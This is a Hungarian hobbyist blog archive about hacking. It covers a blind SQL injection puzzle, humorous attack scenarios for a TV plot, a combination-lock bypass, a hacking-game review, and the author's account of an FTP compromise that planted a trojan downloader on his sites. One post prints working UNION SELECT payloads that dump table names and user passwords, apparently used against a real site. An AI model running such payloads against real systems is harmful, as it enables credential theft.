Csókavár » hack

Hacking!

encse — Thu, 03 Dec 2009 15:08:39 +0000

Nesze Önöknek tisztelt olvasóim egy kis karácsonyi gekkó-utánérzés.

http://csokavar.hu/hacking/webshop/count.php?c=2

Ez egy blind sql feladat, kis csavarral. Aki először megmondja az admin felhasználó jelszavát, kap egy… gratulációt. Aki még nem látott ilyesmit, annak meg valószínűleg nehéz dolga lesz…

Barátok közt

encse — Wed, 30 Sep 2009 12:33:27 +0000

A múltkor egész jópofa hackelés volt a Barátok köztben. Kamilla chates belépési adatait úgy találták ki, hogy megnézték, hogy a böngésző valamilyen kezdőbetűre (a,b,c) felajánl-e login nevet az emlékeiből. Ebből kijött a chamomile. Aztán Bandita megtippelte, hogy a jelszó biztos Kamilla kedvenc tinimagazinjának címe lesz.

Most meg kihagyják a következő ziccert. Nóra elárulta Attilának, hogy Miklós a telefonjában tárolja az összes PIN kódját (gondolom bankkártyák, riasztó meg ilyenek). Erre most azt tervezik Klaudiával, hogy lenyúlják Miklóstól a mobilt. Pedig ha már ilyen hackelősre veszik a figurát, mennyivel szebb lenne már, ha kiderülne, hogy Miklós a mobilját a levelező programjával szinkronizálja, és Attila

A) küldene Miklósnak egy jól formázott HTML levelet, ami valahogy (webes levelező esetén XSS, helyi gép esetén Active-X sebezhetőség) elpostázná a Miklós levelezőjében tárolt adatokat…

B) feltörné Miklós otthoni Wifi hálóját, majd a frissen kijött Windows exploitot kihasználva felnyomná Miklós otthoni gépét is, és a hálózaton keresztül közvetlenül a gépről nyúlná le az adatokat…

C) feltörné a wifit, majd ARP poisoninggal és DNS mérgezéssel eltérítené Miklósnak a netes levelezőjével folytatott adatforgalmát és így lopná el Miklós bejelentkezési adatait.

D) nem tudná feltörni a wifit, ezért kénytelen lenne közvetlenül az ADSL csatornán keresztül man in the middle támadást kivitelezni. Szerencsére hozzáfér a Miklóstól kijövő telefonvonalhoz, hiszen van kulcsa a pincéhez….

Hogy folytatódjon a sorozat? A hívás díja 490Ft + Áfa…

Zárnyitás alapfok

encse — Fri, 07 Aug 2009 14:38:22 +0000

Ezt a lakatot az utcán találtam, valaki elvághatta a vezetéket valami komoly csípő-harapó eszközzel, és talán eltulajdonította a hozzátartozó biciklit/motort. Én meg észrevettem a fűben az eldobott kincset, és mindenképp ki akartam próbálni, hogy fel tudom-e törni.

Természetesen nem tekergettem végig a 100000 kombinációt. Kis próbálgatás után ugyanis feltűnt, hogy ha a rálépek a vezetékre, és megpróbálom széthúzni a zárat, akkor egy kivételével ez összes tárcsa könnyen forog. A szoruló tárcsa 10 lehetséges állásából az egyikben, a közvetlenül mellette levő tárcsa is akadni kezdett. Ebből arra következtettem, hogy megtaláltam a helyes beállítást: a zár kicsit engedett, és emiatt most máshol szorul mint eddig. Ugyanezt eljátszva a többi tárcsára, pár perc alatt meg is találtam a helyes kódot.

Így vegyenek számzáras lakatot maguknak.

Firmware upgrade

encse — Sun, 04 Jan 2009 17:07:45 +0000

Sony a seggem. Az asztali DVD lejátszóm ugyebár tud DivX-et lejátszani, de nem mennek vele a feliratok. Gondoltam jól van, nézzük van-e firmware frissítés a Sonynál. Hát volt is, pont a feliratokhoz. Betűről betűre végigtoltam, és a végén most nem indul el az aparát. Mehetek szervízbe vele. Remek.

Ezen viszont kurvára felbasztam az agyamat… tehát.

táblákok nevei:

42 UNION SELECT 1,table_schema,3,4,5,6,7,table_name,9,10,11,12 FROM
          information_schema.TABLES

oszlopok nevei:

-- CONCAT('0x',HEX('Felhasznalok')) = 0x46656C6861737A6E616C6F6B

42 UNION SELECT 1,2,3,4,5,6,7,COLUMN_NAME,9,10,11,12 FROM
          information_schema.COLUMNS WHERE
                table_name = 0x46656C6861737A6E616C6F6B

felhasználók nevei :))

42 UNION SELECT 1,jelszo,3,4,5,6,7,loginNev,9,10,11,12 FROM
          Felhasznalok

Ez azért még megy. :)

Így legyen ötösöm a lottón

encse — Tue, 29 Jul 2008 20:51:16 +0000

András: Nem igaz, hogy mostanában mennyit frissít a Vista!

Encsé: Hát épp most tölti le a nem hivatalos frissítéseket ezzel a DNS cache mérgezés mókával.

András: Ugyan már, ez digitálisan alá van írva!

Encsé: aha persze…

Ez volt kb. múlt csütörtökön. Ma a buhera blogon olvasom, hogy:

Az Infobyte Security Research csapata közzé tett egy Evilgrade nevű eszköt, amely a legutóbbi DNS cache poisoning hiba kihasználásával, illetve egyéb man-in-the-middle módszerek segítségével lehetővé teszi, hogy elterjedt alkalmazások automatikus frissítési szolgáltatásán keresztül futtassunk saját kódokat a szolgáltatást igénybe vevő számítógépeken.

Hát így. Na ebben kellett volna fogadni a havi fizetésemre.

Ördöglakat

encse — Sat, 09 Feb 2008 15:43:53 +0000

Még mindig vírust keresek… Közben gyorsan végigtoltam az ordoglakat nevű magyar hacker játékot. Íme a hekkerdimplomám: http://ordoglakat.info/diploma.aspx?id=1508 :)

Hát nem csodálatos?

Maga a játék viszonylag egyszerű. A triviális dolgok mellett van benne két sql injectionös pálya, egy nslookupos, meg egy netcates is. Ez utóbbi eszköz nekem új volt, de máris örök barátságot kötöttünk. (Szerencsére van a cygwinben is.)

Az egész nem túl nehéz, ráadásul komplett hint system is segíti a próbálkozót. Egy esti mozi helyett pont jó kikapcsolódás. Az okosok meg úgyis mind gekkót játszanak. :)

Ennyire tökös gyerek a zencsé:

Pálya	Szint	Játékosok	Sikerült	Átlagos idő	Encsé ideje
1	JScript	2001 fő	1674 fő	233 perc	1 perc
2	Hidden Text	1662 fő	1467 fő	429 perc	2 perc
3	Stegano	1476 fő	1124 fő	807 perc	38876 perc
4	Reminder	1124 fő	725 fő	1489 perc	18 perc
5	DirList	725 fő	614 fő	1024 perc	16 perc
6	Decrypt	614 fő	571 fő	732 perc	15 perc
7	Deface	570 fő	518 fő	968 perc	15 perc
8	Info gather	527 fő	468 fő	762 perc	2 perc
9	SQL Inject	464 fő	412 fő	460 perc	7 perc
10	Brute Force	412 fő	373 fő	1016 perc	49 perc
11	Backdoor	372 fő	245 fő	3917 perc	22 perc
12	Diploma	246 fő	206 fő	1861 perc	15 perc

A Steganonál már pár hete elment a kedvem az egésztől, de ma újult erővel ismét belevágtam! A brute forcenál meg csináltam egy gyönyörű Ajaxos codát, ami teljesen magától oldotta meg a feladatot. Na az volt 49 perc…

Még több vírus

encse — Sat, 09 Feb 2008 14:44:54 +0000

Mióta hazajöttem, a vírusokat kutatom az itthoni gépen. Már lefutott a McAfee BartPE verziója: (Cornenet, Generic Delphi Trojan). Nem valami izgalmas.

Most éppen a Panda CD-ről bebootoló verziója fut (ez sajnos elég régi adatbázissal). Ez már kicsit többet talált, de még mindig nem vagyok megelégedve. A legérdekesebb a JS/Downloader.NOE volt, de igazából ez se hozott lázba. Persze még messze nem végzett: a Windows könyvtárig még el se jutott.

Kicsit paranoiás lettem ettől az egésztől. Különösen akkor lesz fasza, ha nem találok semmit… Délután már egy accountot is kikönyörögtem a vállalati tűzfalhoz, és a logokban kerestem gyanús IP-ket (azt a bizonyos Hong Kong-i tartományt). Mondanom se kell: semmi eredmény.

Allkalmasint újratelepítem ezt a két gépet asszem.

Majd elfelejtettem: a monitor természetesen még mindig fejjel lefelé van felcsavarozva, így szöveges módban sajons fejen áll a kép. Ezért aztán lefektettem az egészet ide, magam mellé az asztalra…

shapgvba ejtf(c){…

encse — Tue, 05 Feb 2008 15:45:31 +0000

Amikor a pokol elszabadul.

Rémálom baszki.

Gondos házigazda lévén, rendszeresen nézegetem az oldalaimat, hogy minden rendben van-e, nem kell-e valami hozzászólást kimoderálni stb. Vasárnap feltűnt valami kis apróság. A böngészőm a csokavar.hu főoldalán valami ismeretlen add-in-t akart futtatni. Márpedig én ilyet nem írtam sehova. Aztán nézem a forrást, és 500-600 üres sorral a fájl általam gondolt vége után találtam egy ilyet:

Szoktam ronda kódot írni, de azért ez…

Kiderült, hogy fenti szutyok valami Hong Kongi gépről (58.65.238.60) próbál egy vírust letölteni a látogató gépére.

Aztán elkezdtem a logokat böngészni, míg az FTP logban a következőre nem bukkantam:

Fri Feb 1 23:58:06 2008 [pid 7784] [encse] OK LOGIN: Client “58.65.238.59″

Fri Feb 1 23:58:12 2008 [pid 7787] [encse] OK DOWNLOAD: Client “58.65.238.59″, “/public_html/www/index.php”, 3904 bytes, 16.06Kbyte/sec

Fri Feb 1 23:58:14 2008 [pid 7787] [encse] OK UPLOAD: Client “58.65.238.59″, “/public_html/www/index.php”, 5498 bytes, 11.47Kbyte/sec

Fri Feb 1 23:58:16 2008 [pid 7787] [encse] OK DOWNLOAD: Client “58.65.238.59″, “/public_html/gekko/index.php”, 92 bytes, 0.39Kbyte/sec

Fri Feb 1 23:58:18 2008 [pid 7787] [encse] OK UPLOAD: Client “58.65.238.59″, “/public_html/gekko/index.php”, 1686 bytes, 3.49Kbyte/sec

Fri Feb 1 23:58:21 2008 [pid 7787] [encse] OK DOWNLOAD: Client “58.65.238.59″, “/public_html/blog/index.php”, 54 bytes, 0.23Kbyte/sec

Fri Feb 1 23:58:23 2008 [pid 7787] [encse] OK UPLOAD: Client “58.65.238.59″, “/public_html/blog/index.php”, 1648 bytes, 3.43Kbyte/sec

Fri Feb 1 23:58:26 2008 [pid 7787] [encse] OK DOWNLOAD: Client “58.65.238.59″, “/public_html/zsonglor/index.php”, 5645 bytes, 24.04Kbyte/sec

Fri Feb 1 23:58:28 2008 [pid 7787] [encse] OK UPLOAD: Client “58.65.238.59″, “/public_html/zsonglor/index.php”, 7239 bytes, 10.81Kbyte/sec

Fri Feb 1 23:58:31 2008 [pid 7787] [encse] OK DOWNLOAD: Client “58.65.238.59″, “/public_html/zsonglor/siteswap/index.php”, 7102 bytes, 16.60Kbyte/sec

Fri Feb 1 23:58:33 2008 [pid 7787] [encse] OK UPLOAD: Client “58.65.238.59″, “/public_html/zsonglor/siteswap/index.php”, 8696 bytes, 12.99Kbyte/sec

Ugyanaz a Hong Kongi IP, közvetlen a másik mellett.

Szóval valaki lenyúlta az FTP jelszavamat, és ahogy sejtem, arra használta fel, hogy ugyanezt a jelszólopó trójait terjessze az oldalaimon.

A neten találtam egy fórumot, ahol egy hasonló támadást elemeznek (http://pouet.net/topic.php?which=5006&page=1). Itt az ‘én’ scriptem egy másik mutációját elemzik. Szerintük az egész mögött a Russian Business Network áll, ami a wikipedia leírása alapján nagyjából a maffia. hátafaszom.

Tegnap jelszavakat váltogattam (bankos, céges, stb. el lehet képzelni…) Ma meg egész nap a gépet pucolgattam, de ez tisztának tűnik. Azt gondolom, hogy az otthoni, régi gépemen lesz a trójai, de ez a hétvége előtt nem fog kiderülni.

És az egészben nem is az fáj, hogy engem meghackeltek, mert előfordul az ilyesmi. De a büdös kurva életbe már: a szájbavert zsonglőr oldalamra töltik fel az ótvar szutykukat, hogy az arra tévedő gyerekek gépére másszon fel az a szemét.

Én sose voltam a halálbüntetés ellen: le kéne géppuskázni az egész baszott bagást, úgy ahogy van, aztán nézegethetnek.